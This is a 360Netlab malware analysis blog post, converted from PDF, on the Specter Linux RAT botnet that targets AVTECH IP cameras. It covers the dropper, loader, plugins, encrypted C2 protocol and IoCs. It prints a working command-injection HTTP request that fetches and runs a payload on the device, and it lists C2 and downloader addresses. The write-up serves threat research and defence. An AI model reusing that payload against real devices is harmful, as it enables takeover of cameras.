1/14

Alex.Turing September 25, 2020

Ghost in action: the Specter botnet
blog.netlab.360.com/ghost-in-action-the-specter-botnet/

25 September 2020 / Botnet

Background

On August 20, 2020, 360Netlab Threat Detect System captured a suspicious ELF file
( 22523419f0404d628d02876e69458fbe.css )with 0 VT detection.

When we took a close look, we see a new botnet that targets AVTECH IP Camera / NVR /
DVR devices , and it has flexible configuration, highly modular / plugin, and uses TLS,
ChaCha20, Lz4 to encrypt and compress network traffic.

The ELF we captured is Dropper, it releases a loader, and the loader will send encrypted
traffic requests various Plugins from C2 to perform different functions. The sample build path
is /build/arm-specter-linux-uclibcgnueabi , that is why we named it Specter.

At present, Specter has a lot of unprofessional aspects . For example, it releases two
libraries required by runtime while releasing Loader, but they are all dynamically linked.We
also noticed that Plugin does not expand and load directly in memory.The vulnerability being
targeted is also quite old, a 5 years old on. On the other hand, this botnet has a good layered
design, complex network communication and some other characteristics，which is obviously
a work of professional. Professional aspects come with unprofessional aspects ,
this contradiction makes us speculate that Specter is in the test development stage. We will
see how it goes in the future.

Overview

Specter is a remote control Trojan (RAT) for the Linux platform.

It consists of 3 parts, Dropper, Loader, and Plugin. The main function is determined by
Loader&Plugin. The main functions of Specter are

File management

Download and upload management

Shell service

Socket5 Proxy

Report device information

https://blog.netlab.360.com/ghost-in-action-the-specter-botnet/
https://blog.netlab.360.com/tag/botnet/
https://www.exploit-db.com/exploits/40500


2/14

Execute the script issued by C2

Executing C2 to deliver executable files

The basic process is shown in the figure below:

Propagation

Specter spread its Dropper samples throughAVTECH IP Camera / NVR / DVR Devices
vulnerabilities,The payload being used is as follows:

GET /cgi-bin/nobody/Search.cgi?
action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20
O%20/tmp/webstatus;chmod%20755%20/tmp/webstatus;/tmp/webstatus;rm%20-
f%20/tmp/webstatus;)&password=admin HTTP/1.1 
Host: {}:4443 
Connection: keep-alive 
Accept-Encoding: gzip, deflate 
Accept: */* 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 
Firefox/73.0 
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.7,zh;q=0.5,zh-TW;q=0.3,zh-HK;q=0.2 
Content-Type: text/plain; charset=utf-8 

Sample analysis

Specter's infection process can be divided into 4 stages.，

Stage 0: Preliminary stage, spread through vulnerabilities, implant Dropper on the
device
Stage 1: Dropper releases Loader

https://blog.netlab.360.com/content/images/2020/09/specter_flow.PNG
https://www.exploit-db.com/exploits/40500


3/14

Stage 2: Loading stage, Loader loads Plugin
Stage 3: Plugin executes the instructions issued by C2

Stage1：Stage1: Release stage, Specter_Dropper analysis

The main function of the dropper is to detect the operating environment, decrypt the Loader,
configure the Config, and finally release and start the Loader.

MD5:a8400c378950084fc8ab80b8bb4e5b18

ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, stripped

Packer:No

1.1 Decrypt Loader

Decryption algorithm:XOR byte by byte 0x79 , then negate.
 

Along with the loaders, the runtime library, libc.so.0 and ld-uClibc.so.1  are also
decrypted.Currently these two libraries have no malicious functions, but we speculate that
future versions will hijack some functions of these two libraries to hide the existence of
Specter from file, process and networks’ perspectives

1.2 Configure Config

Look for the written position mark in the Loader sample SpctCF , and then write Config at its
subsequent address.。

 

The comparison is as follows:

https://blog.netlab.360.com/content/images/2020/09/specter_drop_decode.PNG
https://blog.netlab.360.com/content/images/2020/09/specter_drop_setconf.PNG


4/14

1.3 Release and execute Loader

Release Loader to the /tmp/runtimes/hw_ex_watchdog  file and run it, and later on delete
itself to clean up the traces of Dropper。

Stage2: Loading stage, Specter_Loader analysis

The main function of Loader is to decrypt Config, obtain C2 from it, establish encrypted
communication with C2, and execute the instructions issued by C2. If there is no Plugin for
processing the corresponding instructions, it will request the required Plugin from C2.

MD5:470a092abd67e25463425b611088b1db

ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared
libs), stripped

Packer:No

2.1 Decrypt Config

There are C2, mutex name, nonce and other information in the Config file, ChaCha20
encryption is used, where the key is CsFg34HbrJsAx6hjBmxDd7A2Wj0Cz9s\x00  and the
number of rounds is 15 .

https://blog.netlab.360.com/content/images/2020/09/specter_drop_conf.PNG
https://blog.netlab.360.com/content/images/2020/09/specter_drop_run.PNG


5/14

The detailed Config structure is shown below:，

Take the Config in the above figure as an example, the nonce (12 bytes) required for
decryption is:

c1 f5 9e 20 7a 35 9d 25 ed 77 bb 70 

The ciphertext is:

94 69 CA D5 A0 0F 73 A9 BB 05 71 B2 31 1D EF 06  
1A 2A BC 94 3A A7 4B 72 3A 0C BC 8E BF 57 1E 69  
88 1B A1 7D FB 79 6C 26 A9 95 EB B1 E9 53 A9 2B  
33 3D A7 F6 D2 07 E4 64 FD 70 81 C2 83 C2 A1 5F  
13 EB 3F 9C 6F CD 03 50 84 C5 5C 9C 31 B1 9F CF  
06 4B 5F 12 E9 C3 39 C3 EE 07 C5 CE E2 C2 58 FA 
6C AA 6D 9B 00 C2 37 3E C2 98 52 47 D4 4D E7 

After decryption, we get the following plaintext, we can see that C2 is 107.182.186.195
and mutex is fb4mi5a

00000000  f4 36 ce 57 b0 46 d2 96 27 1c a6 88 fe 57 e2 22  |ô6ÎW°FÒ.'.¦.þWâ"| 
00000010  52 34 19 f0 40 4d 62 8d 02 87 6e 69 45 8f be 6a  |R4.ð@Mb...niE.¾j| 
00000020  66 62 34 6d 69 35 61 00 01 00 00 00 0f 00 00 00  |fb4mi5a.........| 
00000030  31 30 37 2e 31 38 32 2e 31 38 36 2e 31 39 35 03  |107.182.186.195.| 
00000040  00 00 00 34 34 33 01 00 00 00 01 00 00 00 01 00  |...443..........| 
00000050  00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00  |................| 
00000060  00 00 01 00 00 00 1e 00 5a 00 14 00 3c 00 00     |........Z...<..| 

2.2 Establish communication with C2

https://blog.netlab.360.com/content/images/2020/09/specter_loader_decode.PNG
https://blog.netlab.360.com/content/images/2020/09/specter_loader_config.PNG


6/14

The communication process can be divided into 4 stages, using TLS, ChaCha20 encryption
algorithm, lz4 compression algorithm to ensure the security of data communication.The first
stage is to establish a TLS connection, the second stage is the process of mutual agreement
authentication, the third stage is the Loader reporting device information, and the fourth
stage executes the C2 issuing instruction process.

TLS communication

In order to analyze the network traffic, we performed a Man-in-the-middle attack,and can see
the result as follows. It can be seen that Specter's network communication packet has a fixed
format.

Packets can be divided into four parts, the detailed structure is shown below:，
 

Where Encrypted Payload_info  stores the payload verification, length, ID and other
info. [Encrypted?]Compressed Payload  is the payload itself, the payload will only be
compressed during the key exchange stage, while in all the other stages it gets both

https://blog.netlab.360.com/content/images/2020/09/specter_loader_ssl.PNG
https://blog.netlab.360.com/content/images/2020/09/specter_loader_commhijack.PNG
https://blog.netlab.360.com/content/images/2020/09/specter_packet_info.PNG


7/14

encrypted and compressed.

Let’s take a look at the above figure, the data packet that Bot sends to C2 for secret key
exchange

The encryption algorithm used in the first part( ncrypted Payload_info ) is:

ChaCha20 
Key:  36 30 30 64 65 33 31 39 61 32 66 38 31 39 62 34  

  61 38 35 31 64 32 33 66 63 34 62 33 33 33 33 65 
Nonce:  E7 66 29 FB 10 98 F6 5A 80 80 FF 58  

The ciphertext is:

0F 41 01 FD 8B 75 6C A2 20 31 DC 35 70 D9 4D 3B 8E 53 4D E9 

after decryption:

C9 3E 00 00 00 00 00 00 00 00 01 00 22 00 00 00 20 00 00 00 

3EC9  ---- CRC16 of Payload 
0001  ---- Cmd Id 
00000022 Compressed Payload length 
00000020 Decomressed Payload length 

The value of Cmd Id  is 1, indicating that it is in the key exchange stage, directly
decompress [Encrypted?]Compressed Payload  and get the key sent by Bot to C2

01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 
11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 

Authentication

The protocol authentication process can be divided into two stages, the first stage is the key
exchange, and the second stage is the mutual recognition of identity.

https://blog.netlab.360.com/content/images/2020/09/specter_loader_commfst.PNG


8/14

According to the data packet decryption process introduced above, we will get.

The secret key sent by Bot to C2 is:

01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 
11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 

The secret key sent by C2 to Bot is:

19 F8 7C 62 7B 8D A2 B3 59 FD AE 25 4C 18 F7 33 
96 B5 D9 F5 EC FF C2 07 C3 7C 87 53 AE 60 99 2C 

In the secret key exchange phase, the payload is only compressed without encryption; after
the secret key is exchanged, Bot and C2 encrypt and compress the payload with each
other's secret key.

It can be solved with the above secret key.

The authentication information sent by Bot to C2 is:

00000000:  44 48 6E 37-34 73 64 50-4F 71 6E 53-64 32 35 39  DHn74sdPOqnSd259 

The authentication information sent by C2 to Bot is:

00000000:  6C 30 53 4F-38 68 46 55-78 62 56 73-64 74 51 34  l0SO8hFUxbVsdtQ4 

This is consistent with the implementation we saw in the sample:

2.3 Report device information, such as MAC/IP address, system type, etc.

https://blog.netlab.360.com/content/images/2020/09/specter_packet_proof.PNG


9/14

2.4 Execute the start Plugin command issued by C2

https://blog.netlab.360.com/content/images/2020/09/specter_loader_device.PNG
https://blog.netlab.360.com/content/images/2020/09/specter_loader_cmd.PNG


10/14

Specter implements a very flexible plugin management communication mechanism, each
plugin must implement the following 4 methods,

 

If there is no corresponding Plugin currently, a request is made to C2 and finally dynamically
loaded into Loader Plugin Slot .

Stage3: Specter_Plugin analysis

When the bot gets the Plugin issued by C2, it cannot be used directly, because they are
encrypted and can only be loaded into the Plugin Slot for use after decryption.

 Decryption algorithm: XOR 0x7f  byte by byte, then negate

Here are some plugins we captured:

Shell plugin

https://blog.netlab.360.com/content/images/2020/09/specter_loader_syscall.PNG
https://blog.netlab.360.com/content/images/2020/09/specter_plugin_decode.PNG


11/14

Plugin id: 1

c7bf33d159597f55dce31b33a58d52de

ELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped

The main function of Shell plugin is to create SHELL service.

File plugin

Plugin id: 2

e67db6449c18b2e552786df7718a33c8

ELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped

The main function of the File plugin is file management. In addition to supporting read, write,
delete, and search operations on file directories, it may also download/upload files from a
designated server.

https://blog.netlab.360.com/content/images/2020/09/specter_plugin_shell.PNG


12/14

Socket Plugin

https://blog.netlab.360.com/content/images/2020/09/specter_plugin_file.PNG


13/14

Plugin id: 3

45c5e7bcb9987356b53fd9a78543dcda

ELF 32-bit LSB shared object, ARM, version 1 (SYSV), not stripped

The main function of Socket Plugin is to start Socket5 proxy.

SSF Plugin

Plugin id: 5

da0f9a21ae7ee3d15794946ca74a07e3

ELF 32-bit LSB shared object, ARM, version 1 (SYSV), stripped

The main function of SSF Plugin is to download an executable file from a specified server to
a local /tmp/runtimes/httpd_log_output  file, and then execute it.。

Suggestions

We recommend that readers monitor and block Specter related IP, URL and samples.

联系我们

https://blog.netlab.360.com/content/images/2020/09/specter_plugin_socket.PNG
https://blog.netlab.360.com/content/images/2020/09/specter_plugin_ssf.PNG


14/14

Readers are always welcomed to reach us on twitter , WeChat 360Netlab or email to netlab
at 360 dot cn.

IoC

CC

107.182.186.195:443 ASN25820|IT7_Networks_Inc 
United_States|California|Los_Angeles 

Sample MD5

04c7ef9e4197985d31e5d601a9161c5e 
052b6fce24a800259289e2f06163db57 
065d942effb6010bb48f7403d3ad442b 
0d0bf23412bd34c82ab28e67278519bf 
2b89fd69d128c8a28425c512670e531a 
2ed27722e095b1c870fdb10e4990db0f 
42d341d0b76869abc2231c70d0f0ecc9 
5e03c99153ed59546bf60c9f896a30f1 
7377eedb6512743858d52da3cc028a33 
7c59ddc06da158afc8b514a9a81ffd36 
a5ded8b31b17c88302882cccc35cc28f 
a8400c378950084fc8ab80b8bb4e5b18 
a99563e6711990b9b3f542ae146bd01c 
acfa5f547b69bde0bf3f343429594b99 
b79639e2b5d10f92ea44721e155fc09b 
b9ac3d23faba205f74ebd932d8e370d3 
c2126977f9f482f290154ea21719330f 
c33b585a0dfa5fdb70d27a17ace6ba1f 
c51fc1656aa857bb7226e2df969aa72d 
cc1b11c6ac6e5bebc4c0e7502b4e1fcd 
cc27d6141f8c66e520122e8f2292a940 
eda6d2b0837b5e78ae1b0b50f85e3321 

Downloader

http://45.76.70.163:80/style/22523419f0404d628d02876e69458fbe.css 

https://twitter.com/360Netlab